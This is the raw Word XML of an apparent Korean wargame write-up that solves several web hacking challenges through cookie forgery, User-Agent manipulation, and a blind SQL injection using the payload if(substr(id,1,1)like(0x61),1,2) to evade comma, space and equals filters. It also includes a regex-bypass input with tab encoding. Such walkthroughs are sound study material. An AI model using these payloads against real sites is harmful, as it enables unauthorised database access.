          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62F58F8D" wp14:editId="32AD2F18">
            <wp:extent cx="2266950" cy="2190750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</w:t>
      </w:r>
      <w:r>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>으로 두고 암호화를 거치면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335572FC" wp14:editId="308678E0">
            <wp:extent cx="5410200" cy="437197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암호문을 얻을 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B7047" w:rsidRDefault="004B7047" w:rsidP="00A306D1">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">이를 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">user, password </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>쿠키에 넣어 주면</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B7047" w:rsidRDefault="004B7047" w:rsidP="00A306D1">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20BCF922" wp14:editId="44F749EB">
            <wp:extent cx="5731510" cy="1871345"/>
            <wp:effectExtent l="0" t="0" r="254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Pr="00B00DBB" w:rsidRDefault="004B7047" w:rsidP="004B7047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7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E519C" w:rsidRPr="003E519C" w:rsidRDefault="003E519C" w:rsidP="003E519C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33DAA54D" wp14:editId="4252723A">
            <wp:extent cx="5731510" cy="883920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4B7047">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>문제 오류</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B7047" w:rsidRPr="00B00DBB" w:rsidRDefault="004B7047" w:rsidP="004B7047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t>prob8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E519C" w:rsidRDefault="003E519C" w:rsidP="003E519C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15D19B3B" wp14:editId="1123A074">
            <wp:extent cx="1219200" cy="638175"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>소스부터 확인해 보겠다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E519C" w:rsidRDefault="003E519C" w:rsidP="003E519C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CACC3D6" wp14:editId="3E5DA90E">
            <wp:extent cx="3638550" cy="3009900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확인해보자.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D6775FE" wp14:editId="4F35B0B3">
            <wp:extent cx="5731510" cy="4836160"/>
            <wp:effectExtent l="0" t="0" r="2540" b="254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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>문제이다.</w:t>
      </w:r>
      <w:r w:rsidR="00D93FC3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005740C0">
        <w:t xml:space="preserve">agent </w:t>
      </w:r>
      <w:r w:rsidR="005740C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">변수에 </w:t>
      </w:r>
      <w:r w:rsidR="005740C0">
        <w:t xml:space="preserve">USER-AGENT </w:t>
      </w:r>
      <w:r w:rsidR="005740C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">헤더에 값을 넣어주고 여러 필터링을 거친 뒤 </w:t>
      </w:r>
      <w:r w:rsidR="005740C0">
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidR="005740C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>의 수를 l</w:t>
      </w:r>
      <w:r w:rsidR="005740C0">
        <w:t xml:space="preserve">v0 </w:t>
      </w:r>
      <w:r w:rsidR="005740C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>테이블로부터 가져온다.</w:t>
      </w:r>
      <w:r w:rsidR="005740C0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005740C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">만약 카운터가 </w:t>
      </w:r>
      <w:r w:rsidR="005740C0">
        <w:t xml:space="preserve">70 </w:t>
      </w:r>
      <w:r w:rsidR="005740C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이상이라면 l</w:t>
      </w:r>
      <w:r w:rsidR="005740C0">
        <w:t>v0</w:t>
      </w:r>
      <w:r w:rsidR="005740C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>에 있는 값을 모두 삭제한다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005740C0" w:rsidRDefault="005740C0" w:rsidP="003E519C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">그 후 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">USER-AGENT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">헤더 값을 조건으로 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">lv0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">테이블에서 조회를 해 오는데 그게 만약 </w:t>
      </w:r>
      <w:r>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이면 문제가 해결된다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005740C0" w:rsidRDefault="005740C0" w:rsidP="003E519C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>만약 조회한 값이 아무것도 없다면 l</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">v0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">테이블의 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">agent, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>칼럼에 값을 넣는다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005740C0" w:rsidRDefault="005740C0" w:rsidP="003E519C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FB3A122" wp14:editId="764AFA93">
            <wp:extent cx="3057525" cy="2257425"/>
            <wp:effectExtent l="0" t="0" r="9525" b="952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0" w:rsidRDefault="005740C0" w:rsidP="003E519C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>여기서 t</w:t>
      </w:r>
      <w:r>
        <w:t>aint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">한 변수는 </w:t>
      </w:r>
      <w:r>
        <w:t>agent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이므로 이를 바꾸어 a</w:t>
      </w:r>
      <w:r>
        <w:t>dmin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를 </w:t>
      </w:r>
      <w:r>
        <w:t>lv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테이블에 넣었다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005740C0" w:rsidRDefault="005740C0" w:rsidP="003E519C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EB34B3B" wp14:editId="238C54FC">
            <wp:extent cx="5267325" cy="4038600"/>
            <wp:effectExtent l="0" t="0" r="952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0" w:rsidRDefault="005740C0" w:rsidP="003E519C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">gent </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">값을 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>krrr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">로 넣었으므로 이를 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">User-Agent </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">속성에 넣어 값을 조회하면 </w:t>
      </w:r>
      <w:r>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이 조회되면서 문제가 풀린다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B00DBB" w:rsidRDefault="00B00DBB" w:rsidP="003E519C"/>
    <w:p w:rsidR="00B00DBB" w:rsidRDefault="00B00DBB" w:rsidP="003E519C"/>
    <w:p w:rsidR="00B00DBB" w:rsidRDefault="00B00DBB" w:rsidP="003E519C"/>
    <w:p w:rsidR="00B00DBB" w:rsidRDefault="00B00DBB" w:rsidP="003E519C"/>
    <w:p w:rsidR="00B00DBB" w:rsidRPr="00B00DBB" w:rsidRDefault="00B00DBB" w:rsidP="00B00DBB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9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B00DBB" w:rsidRDefault="00B00DBB" w:rsidP="00B00DBB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3721DF26" wp14:editId="7F352351">
            <wp:extent cx="2247900" cy="600075"/>
            <wp:effectExtent l="0" t="0" r="0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BB" w:rsidRDefault="00B00DBB" w:rsidP="00B00DBB">
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">을 누르면 </w:t>
      </w:r>
      <w:r>
        <w:t>apple, 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">를 누르면 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">banana, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">3을 누르면 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B00DBB" w:rsidRDefault="00B00DBB" w:rsidP="00B00DBB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35D62A42" wp14:editId="20684792">
            <wp:extent cx="1304925" cy="819150"/>
            <wp:effectExtent l="0" t="0" r="952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BB" w:rsidRDefault="00B00DBB" w:rsidP="00B00DBB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>힌트가 나온다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00414F59" w:rsidRDefault="00414F59" w:rsidP="00B00DBB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4872AF56" wp14:editId="571DD015">
            <wp:extent cx="5562600" cy="1190625"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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9" w:rsidRDefault="00414F59" w:rsidP="00B00DBB"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에 반응이 없으므로 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>변수를 이용해보면</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00414F59" w:rsidRDefault="00414F59" w:rsidP="00B00DBB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39E878D1" wp14:editId="62BD6582">
            <wp:extent cx="5010150" cy="676275"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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9" w:rsidRDefault="00414F59" w:rsidP="00B00DBB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>ccess Denied</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>가 뜬다.</w:t>
      </w:r>
      <w:r w:rsidR="004A64F3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A64F3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>콤마를 빼니까 되는데,</w:t>
      </w:r>
      <w:r w:rsidR="004A64F3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A64F3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>콤마를 필터링 하는 것 같다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A64F3" w:rsidRDefault="004A64F3" w:rsidP="00B00DBB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7089E61E" wp14:editId="10238BC9">
            <wp:extent cx="5731510" cy="699135"/>
            <wp:effectExtent l="0" t="0" r="2540" b="571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F3" w:rsidRDefault="004A64F3" w:rsidP="00B00DBB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>공백 필터링,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>대입 연산자 필터링,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>콤마 필터링이 되고 있기 때문에</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A64F3" w:rsidRDefault="004A64F3" w:rsidP="00B00DBB">
      <w:r w:rsidRPr="004A64F3">
        <w:t>if(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A64F3">
        <w:t>substr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A64F3">
        <w:t>(id,1,1)like(0x61),1,2)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>문장으로 맞으면 A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">pple, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">아니라면 </w:t>
      </w:r>
      <w:r>
        <w:t>Banana</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>가 뜨도록 해서</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A64F3" w:rsidRDefault="004A64F3" w:rsidP="00B00DBB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">lind </w:t>
      </w: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>을 해보도록 하겠다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A64F3" w:rsidRDefault="002A6ED7" w:rsidP="00B00DBB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5835EE0B" wp14:editId="6CFA15FF">
            <wp:extent cx="5731510" cy="2074545"/>
            <wp:effectExtent l="0" t="0" r="2540" b="190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D7" w:rsidRDefault="002F582E" w:rsidP="00B00DBB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FB08ED9" wp14:editId="5AE13EB6">
            <wp:extent cx="1247775" cy="4600575"/>
            <wp:effectExtent l="0" t="0" r="9525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B00DBB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4090B1B4">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>336430</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3709358" cy="1362621"/>
            <wp:effectExtent l="0" t="0" r="5715" b="9525"/>
            <wp:wrapSquare wrapText="bothSides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136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lag is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>민간좀비</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="002F582E" w:rsidRDefault="002F582E" w:rsidP="00B00DBB"/>
    <w:p w:rsidR="002F582E" w:rsidRDefault="002F582E" w:rsidP="00B00DBB"/>
    <w:p w:rsidR="002F582E" w:rsidRDefault="002F582E" w:rsidP="00B00DBB"/>
    <w:p w:rsidR="002F582E" w:rsidRDefault="002F582E" w:rsidP="00B00DBB"/>
    <w:p w:rsidR="002F582E" w:rsidRPr="002F582E" w:rsidRDefault="002F582E" w:rsidP="002F582E">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F582E">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="002F582E">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>rob10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F582E" w:rsidRDefault="002F582E" w:rsidP="002F582E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F31AD9C" wp14:editId="12F4F7A7">
            <wp:extent cx="5731510" cy="1102360"/>
            <wp:effectExtent l="0" t="0" r="254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2F582E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DEC6601" wp14:editId="7B668648">
            <wp:extent cx="5731510" cy="1652270"/>
            <wp:effectExtent l="0" t="0" r="2540" b="508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2F582E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">계속 해봤는데 크롬이면 문제가 작동을 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>안한다고</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 한다 </w:t>
      </w:r>
      <w:r w:rsidR="000101BD">
        <w:t>– IE</w:t>
      </w:r>
      <w:r w:rsidR="000101BD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로 켜서 다시 시도하겠다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000101BD" w:rsidRDefault="000101BD" w:rsidP="002F582E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">O를 클릭하면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가는데 </w:t>
      </w:r>
      <w:r>
        <w:t>800</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>까지 가야한다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000101BD" w:rsidRDefault="000101BD" w:rsidP="002F582E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="267B0A49" wp14:editId="7D2AFD6D">
            <wp:extent cx="990600" cy="304800"/>
            <wp:effectExtent l="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BD" w:rsidRDefault="000101BD" w:rsidP="002F582E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>osLeft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:t>=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">을 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>posLeft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>+=100</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>으로 바꿔서 시도하자.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000101BD" w:rsidRDefault="000101BD" w:rsidP="002F582E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6219E7A1" wp14:editId="70B89DB0">
            <wp:extent cx="5731510" cy="809625"/>
            <wp:effectExtent l="0" t="0" r="2540" b="952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BD" w:rsidRPr="000101BD" w:rsidRDefault="000101BD" w:rsidP="000101BD">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000101BD">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="000101BD">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>rob11</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000101BD" w:rsidRDefault="000101BD" w:rsidP="002F582E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EDB10CE" wp14:editId="481A7535">
            <wp:extent cx="3790950" cy="156210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3A" w:rsidRDefault="00313B3A" w:rsidP="002F582E">
      <w:r>
        <w:t xml:space="preserve">pat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>변수에는 정규 표현식이 들어있고</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00313B3A" w:rsidRDefault="00313B3A" w:rsidP="002F582E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>reg_match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v</w:t>
      </w:r>
      <w:r>
        <w:t>al</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>변수와 비교한다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00313B3A" w:rsidRDefault="00313B3A" w:rsidP="002F582E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:t>1-3]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1부터 </w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>까지의 문자 하나</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00313B3A" w:rsidRDefault="00313B3A" w:rsidP="002F582E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:t>a-f]{5}: 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 xml:space="preserve">까지의 문자 </w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>개</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00313B3A" w:rsidRDefault="00313B3A" w:rsidP="002F582E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1개 아무거나</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00313B3A" w:rsidRDefault="00313B3A" w:rsidP="002F582E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">아무 문자 </w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>개부터 무한개까지</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D216CA" w:rsidRDefault="00313B3A" w:rsidP="002F582E">
      <w:r w:rsidRPr="00313B3A">
        <w:t>1abcde_1218.146.20.611%09p%09a%09s%09s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D216CA">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>탭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상에서 </w:t>
      </w:r>
      <w:r>
        <w:t>%09</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">로 </w:t>
      </w:r>
      <w:r w:rsidR="00D216CA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
